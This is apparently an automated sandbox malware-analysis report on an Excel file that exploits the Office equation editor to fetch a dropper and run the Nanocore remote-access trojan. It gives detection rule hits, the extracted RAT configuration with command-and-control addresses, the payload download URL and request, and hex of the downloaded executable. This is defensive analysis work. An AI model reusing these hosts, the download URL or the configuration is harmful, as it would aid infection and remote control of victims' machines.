15.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
15.2.MSBuild.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
15.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
15.2.MSBuild.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
18.2.vbc.exe.1e90000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.2.vbc.exe.1e90000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.2.vbc.exe.1e90000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.vbc.exe.1e90000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
14.2.vbc.exe.2860000.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.2.vbc.exe.2860000.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.2.vbc.exe.2860000.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.vbc.exe.2860000.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 67 entries

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.245.45.28, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2500, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe

Avira URL Cloud: Label: phishing

Found malware configuration

Show sources

Source: 24.2.vbc.exe.2760000.6.raw.unpack

Malware Configuration Extractor: NanoCore {"Version": ".0.0.0,", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8"}

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
Source: Yara match	File source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

Joe Sandbox ML: detected

Source: 8.2.vbc.exe.2860000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 23.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 13.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.2.vbc.exe.2830000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 15.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.vbc.exe.2860000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 30.2.vbc.exe.2830000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 20.2.vbc.exe.27f0000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 28.2.vbc.exe.2940000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 24.2.vbc.exe.27f0000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 21.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 27.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 29.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 22.2.vbc.exe.2850000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 25.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 26.2.vbc.exe.27e0000.7.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.vbc.exe.30a0000.8.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 31.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 12.2.vbc.exe.1f10000.4.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 9.2.MSBuild.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2150153409.0000000003270000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.2167801125.0000000002900000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.2179925246.00000000029C0000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.2191624487.0000000002860000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Source: global traffic

DNS query: name: myhostisstillgood11.zapto.org

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.245.45.28:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.245.45.28:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: 79.134.225.26
Source: Malware configuration extractor	URLs: nassiru1166main.ddns.net

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 12:55:40 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Mon, 03 May 2021 07:04:16 GMTETag: "923fb-5c16791e13768"Accept-Ranges: bytesContent-Length: 599035Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e4 d6 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 64 00 00 00 d0 01 00 00 04 00 00 61 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 84 00 00 a0 00 00 00 00 d0 02 00 c8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c 62 00 00 00 10 00 00 00 64 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 74 12 00 00 00 80 00 00 00 14 00 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 a8 01 00 00 a0 00 00 00 06 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 0b 00 00 00 d0 02 00 00 0c 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View

IP Address: 172.245.45.28 172.245.45.28

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /dashboard/docs/images/nd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myhostisstillgood11.zapto.orgConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: myhostisstillgood11.zapto.org

Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 0000000A.00000002.2202157989.0000000002B60000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_0040548D

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000018.00000002.2302975207.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2321994260.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
